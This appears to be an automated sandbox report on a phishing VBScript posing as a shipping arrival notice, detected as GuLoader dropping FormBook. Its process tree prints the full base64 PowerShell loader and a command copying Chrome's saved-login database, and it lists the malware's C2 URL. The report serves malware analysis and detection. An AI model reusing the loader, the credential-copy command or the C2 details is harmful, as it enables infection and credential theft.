Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs

Overview

General Information

Sample Name:NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs
Analysis ID:688300
MD5:c135e86f18c163467d7cd19771896ca7
SHA1:cb5bfae30b2658e0ce4131afbafb26c671651e50
SHA256:a2762f35bec58d4ab2672ac25ae1c550b9ba87d124f4cef69fad842e46b4de5c
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 4980 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 4328 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAHIAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYwBvAG0AIABVAG4AcAByAG8AYgBpACAASQBuAGYAdQBzAGUAcgBzAGgAZQAgAFMAcABlAGMAdAByAGUAbABpACAAVgBlAGwAbAB5AGsAawBlAHQAIABpAG4AZgBhAG4AdAAgAFAAZQBqAGwAcwB0AG8AawBrACAARwBhAHUAcwBzAGYAaQBsAHQAIABBAHIAdABpAGYAIABTAGEAbABpAG4AZQAgAHYAYQBsAGYAYQAgAEYAaQBzAHQAIABQAGwAZQB1AHIAbwBzAHQAaQAgAGMAbABhAG4AcwB3AG8AbQBlACAASQBuAGgAYQBiAGkAbABlACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABEAGUAYwBhAHAAaQB0AGEAdAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFMAbABlAGUAcABFAHgAKABpAG4AdAAgAEIAcgBhAGQAeQBzAHAAMAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABHAGUAdABXAGkAbgBkAG8AdwBEAEMAKAApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACQATQBhAHMAdABlAHIATQBpAG4AZAApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABWAGkAdAByAG8AUwBvAGwAaQBkACgAaQBuAHQAIABEAGUAYwBhAHAAaQB0AGEAdAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHkAbQBwAHQAbwBtAGkALABpAG4AdAAgAFMAcAByAG8AZwAsAHIAZQBmACAASQBuAHQAMwAyACAARABlAGMAYQBwAGkAdABhAHQALABpAG4AdAAgAFUAbgBmAGwAYQBnAGYAbwA0ADAALABpAG4AdAAgAEQAZQBjAGEAcABpAHQAYQB0ADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBEADIAcwB0AGEAbQBwACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABQAG8AbwBsAFMAdABhAGMAawAoACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIARQBuAHUAbQBXAGkAbgBkAG8AdwBzACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATQBvAHIAcQBxACgAdQBpAG4AdAAgAFMAcAByAG8AZwA1ACwAaQBuAHQAIABTAHAAcgBvAGcANgApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB2AG8AaQBkACAAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoAEkAbgB0AFAAdAByACAAUwBwAHIAbwBnADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAFMAcAByAG8AZwAyACwAaQBuAHQAIABTAHAAcgBvAGcAMwApADsADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAUwB0AGUAbABsAGEAcgAgAFMAdgBhAGwAZQBnAGEAbgBnACAATgBhAHQAaQBvAG4AYQAgAFMAawByAGEAYgBuAHMAZQAgAEYAdQBuAGMAdABpAG8AbgBpACAAQQBjAGgAYQBlACAAQgByAGUAZABkAGUAIABlAHAAbwBjAGgAbwB2AGUAcgB0ACAATwB1AHQAeQBlACAARwByAG8AdQAgAFMAbgByAGUAbgByAGUAYwBvAG4AIABIAHUAcwBwAGwAYQAgAFMAdABhAHYAZQBrAG8AbgB0AHIAIABQAHUAbABsACAAVQBuAHIAZQBjAG8AZwBuACAARAByAGkAawBrAGUAbgBkAGUAdAAgAEUAbgBnAGkAbgBlAGUAcgBlAHMAIAAgAA0ACgAkAEQAZQBjAGEAcABpAHQAYQB0ADMAPQAwADsADQAKACMAQgBhAGwAZAB1AGMAdAAgAEQAaQBhAGMAbwBuAGEAIABTAGMAbABlAHIAZQBjAHQAIABEAGEAdABhACAAUgBhAGEAYgAgAEgAZQBnAG4AcwB0AHIAYQAgAFUAdABpAGwAIABLAG8AbgBkAG8AbABlAG4AIABPAHYAZQByAGkAZAAgAHYAaQBsAGsAYQBhAHIAbABpACAATwB2AGUAcgBzACAAYwBvAG4AZgBpACAAVABhAGcAZQB0AGUAcwBlAG4AZQAgAEIAbwB0AHQAbABlACAAUwBhAG4AZwBmAHUAZwBsAGUAbgAgAEcAdQBkAGQAbwBtAG0AZwAgAG0AdQBuAGsAZQBvAHIAZAAgAEEAbQB5AGcAZABhAGwAaQBjAGsAIABTAGUAYQBsAGUAdAB0ACAARgByAHMAdABlAGcAYQBuAGcAcwAgAFIAZQBtAG8AcgBkACAAVQBuAGcAbwB2AGUAcgAgAEEAcABwAGUAdAAgAFMAdQByAG0AdQBsAGUAcgAgAEsAdgBhAG4AdAB1AG0AbQBlACAADQAKACQARABlAGMAYQBwAGkAdABhAHQAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAIwBMAGEAbgBpAHMAdABhAGMAYQAgAGgAdQBuAGQAIABJAG4AdgBvAGMAYQAgAEcAbwBzAHAAZQBsAGUAIABDAG8AdQBuAHQAIABkAGUAbABvAGMAYQAgAEEAcgBhAGsAIABNAG8AZABlAG0AcAByAG8AZwAgAFYAYQBuAGQAbABlACAASQBzAG8AcABsACAAQgBhAG4AZABhAG4AaQBzACAARgBqAG8AcgB0ACAATAB5AHMAcwBlAGUAIABmAGwAdQBvAHIAZQBzAGMAZQAgAFUAbgBrAG4AIABCAG8AdwBrAHQAcgAgAFMAdAB1AGIAaABhAHIAdgAgAE4AbwBuAHMAcABpAHIAIABFAHIAcABlAHQAbwBsAG8AIABQAGwAZQB1AHIAbwBjAGEAcABzACAAUwB0AGUAbgBpAG4AZwBlAHIAcwAgAFIAZQBuAHIAaQBuACAADQAKACQARABlAGMAYQBwAGkAdABhAHQAOAA9AFsARABlAGMAYQBwAGkAdABhAHQAMQBdADoAOgBWAGkAdAByAG8AUwBvAGwAaQBkACgALQAxACwAWwByAGUAZgBdACQARABlAGMAYQBwAGkAdABhAHQAMwAsADAALABbAHIAZQBmAF0AJABEAGUAYwBhAHAAaQB0AGEAdAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMATgBvAGMAdABhAG0AYgB1AGwAYQAgAFMAdABpAG4AawBlAHIAdgByAGEAIABQAGEAcgB0AG4AZQByAHMAawBlACAAVABoAGUAcgBtAG8AIABTAGUAcgB2AGUAcgBpAG4AZwAgAEUAZgB0AGUAIABtAHUAcwBrAHUAbAAgAFIAZQBpAG4AdgBpAHQAIABCAG8AbABzAHQAZQByACAAQgBhAHIAawBrACAATABlAHQAaABhAHIAZwBpAGMAYQAgAE0AYQBsAGEAbgBnAGEAcwB0AGEAIABQAG8AbAB5AHAAbwBpAGQAYQAgAEIAbwB0AHQAbwAgAFgAZQBuAG8AZwBlAG4AIABTAGwAaQBwAHAAZQAgAFAAbwBzAHQAYwBsAGEAdgAgAFUAbgB0AGUAbQBwAGUAIABBAHIAZQB0AHUAYgBlACAAQQBjAHEAdQBpAHMAaQAgAHQAYQBiAG8AdQByACAAQQB0AHQAYQBpAG4AIABMAGkAZwBlAGYAcgAgAFAAbABhAGQAcwBwACAARgBvAHMAdABlAHIAZgAgAEEAbgB2AGUAbgBkAGUAbABzAGUAIABGAGEAcwB0AGwAZwBuAGkAIABQAHIAbwBwAHkAIABGAG8AcgB0AGoAZQBuAGUAIAANAAoAJABDAG8AYwB1AGkAcwBhAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEoAdQBuAGcAbQBuAGQAYQBmADEAMQAiACkALgBSAGUAcwBwAHIAYQB5AA0ACgAjAE0AaQBjAHIAbwBiAHUAcwAgAEQAbwB0AGEAdABpACAAUwB0AHIAYQBuAGQAdgBhAHMAawAgAFAAcwBhAGwAdABlAHIAaQBhAGIAIABGAGEAcgB2AGUAaABhAG4AZAAgAFMAawB1AG0AbABlAHIAIABNAGEAawByAGUAbABsACAAQwBvAHIAcwBhACAAdQBuAGkAbwBuAHMAdABpACAASABlAGEAZABiACAARAB5AHIAZQB0AG0AbQBlAHIAZQAgAFUAbgBzAG8AbgBiAG8AdQBsACAATAByAGUAbQBlAHMAdAByAGUAcwAgAEYAZgBlAG4AIABCAGEAZwBzAGwAYQBnACAARwB5AGwAcABlAG4AZQBsAGUAIAB1AHAAdwBhACAADQAKACQASwBvAHAAdQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAFsAXQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBdACwAJABDAG8AYwB1AGkAcwBhAGYALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkADQAKACMAVgBhAHMAbwBjAG8AbgBzAHQAcgAgAEYAcgBlAGQAYQBnACAATgBhAGQAYQB0ACAAVQByAG8AdABvAHgAIABDAG8AbABsAG8AaQBkAGEAIABCAGUAawBlAG4AZAB0ACAASABlAGwAaQBvAG0AZQB0AGUAIABTAHQAcgBpACAAQQBkAGEAbABhAHQAZgByAGUAcwAgAFMAbwBsAGIAIABHAGUAbgBpAG4AcwB0AHYAIABPAGYAZgBlAG4AZABhAGIAIAB1AG0AeQBuAGQAaQBnAGcAcgAgAFMAcABhAHMAIABiAHIAdABzAHAAaQBsAGwAZQB0ACAAZgBvAHIAZwB5AGwAZAB0ACAAdgBhAGMAYQB0AGkAbwBuAGUAIABCAGUAbgBnAGEAIABBAG4AdABlAHAAIAANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAQwBvAGMAdQBpAHMAYQBmAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAEsAbwBwAHUAbABbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAEMAbwBjAHUAaQBzAGEAZgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAEMAaABlAGMAawBiAGwAPQAwADsAIAAkAEMAaABlAGMAawBiAGwAIAAtAGwAdAAgACQASwBvAHAAdQBsAC4AYwBvAHUAbgB0ACAAOwAgACQAQwBoAGUAYwBrAGIAbAArACsAKQANAAoAewANAAoACQANAAoAWwBEAGUAYwBhAHAAaQB0AGEAdAAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEQAZQBjAGEAcABpAHQAYQB0ADMAKwAkAEMAaABlAGMAawBiAGwALABbAHIAZQBmAF0AJABLAG8AcAB1AGwAWwAkAEMAaABlAGMAawBiAGwAXQAsADEAKQANAAoADQAKAH0ADQAKAFsARABlAGMAYQBwAGkAdABhAHQAMQBdADoAOgBNAG8AcgBxAHEAKAAkAEQAZQBjAGEAcABpAHQAYQB0ADMALAAgADAAKQANAAoADQAKAA0ACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 1280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1272 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC6A9.tmp" "c:\Users\user\AppData\Local\Temp\r0st5wfi\CSC6C14E777B6F1436A823D509EAA82CA50.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 5932 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • explorer.exe (PID: 4848 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
          • autoconv.exe (PID: 8108 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 469594005E3B94C5945BCCE7FC521C05)
          • wscript.exe (PID: 7244 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
            • cmd.exe (PID: 5288 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • firefox.exe (PID: 7356 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
          • ieinstal.exe (PID: 2720 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: 7871873BABCEA94FBA13900B561C7C55)
          • ieinstal.exe (PID: 5524 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: 7871873BABCEA94FBA13900B561C7C55)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.34652021.xyz/oe07/"], "decoy": ["wallyatwestminster.com", "wintimeslot.com", "lahustlesharder.net", "xn----7sbbah5aj7bmveh6d.top", "arieljewe.online", "hyle.finance", "sefulty.com", "heartofhuddersfield.com", "solarmovies1.com", "as930.com", "avi3p3g.top", "rvhotspots.com", "8nmzjhf3t7.xyz", "priorityfirst.info", "kleidermode.site", "elixirafricano-oficial.store", "changewithoutchurn.com", "ransbottompottery.com", "openhousebroward.com", "lafeestore.com", "trustedbystudents.co.uk", "globalshopf.online", "mkb-coach.online", "213215.com", "acceshire.net", "pro-pr.press", "bigcitygirl.net", "vivino.app", "xn--o39az44cuvdsyh.com", "b12-overdose.site", "stephenritson.com", "lygjllxs.com", "lovecuradora.com", "youpaihust.com", "sesliolur.com", "7h5ll.com", "afrokalegacy.com", "kumarmanoj.land", "yfxflg.com", "www55275.com", "byte.black", "xn--8prp8wjqv1gg513a.xn--55qx5d", "k-popquiz.com", "uniconsierge.com", "autodaohua.com", "58892.xyz", "onewayconnecting.online", "aaquii.com", "kiungte.xyz", "22525.top", "semimi.xyz", "capital5.xyz", "newpartnerlife.top", "python3.network", "transporthosike.net", "meizhuangs.com", "erinandroger.com", "qavsrwkg.top", "purposeandprofit.info", "yanyun.xyz", "annmingyehmd.com", "ypls.net", "marketingood.com", "vietnamwatch.site"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x4839:$sqlite3step: 68 34 1C 7B E1
    • 0x494c:$sqlite3step: 68 34 1C 7B E1
    • 0x4868:$sqlite3text: 68 38 2A 90 C5
    • 0x498d:$sqlite3text: 68 38 2A 90 C5
    • 0x487b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x49a3:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x8bb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x18a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 26 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.11.2035.155.7.18349792802031449 08/22/22-20:06:33.491474
      SID:2031449
      Source Port:49792
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.77.55.16149797802031449 08/22/22-20:07:16.415553
      SID:2031449
      Source Port:49797
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20166.88.142.6349782802031449 08/22/22-20:04:07.235965
      SID:2031449
      Source Port:49782
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20166.88.142.6349782802031453 08/22/22-20:04:07.235965
      SID:2031453
      Source Port:49782
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.201.1.1.159647532023883 08/22/22-20:04:50.388391
      SID:2023883
      Source Port:59647
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.11.201.1.1.153900532023883 08/22/22-20:06:13.557677
      SID:2023883
      Source Port:53900
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.11.2045.77.55.16149797802031453 08/22/22-20:07:16.415553
      SID:2031453
      Source Port:49797
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2035.155.7.18349792802031412 08/22/22-20:06:33.491474
      SID:2031412
      Source Port:49792
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.77.55.16149797802031412 08/22/22-20:07:16.415553
      SID:2031412
      Source Port:49797
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20166.88.142.6349782802031412 08/22/22-20:04:07.235965
      SID:2031412
      Source Port:49782
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2035.155.7.18349792802031453 08/22/22-20:06:33.491474
      SID:2031453
      Source Port:49792
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbsVirustotal: Detection: 10%Perma Link
      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Antivirus detection for URL or domain
      Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
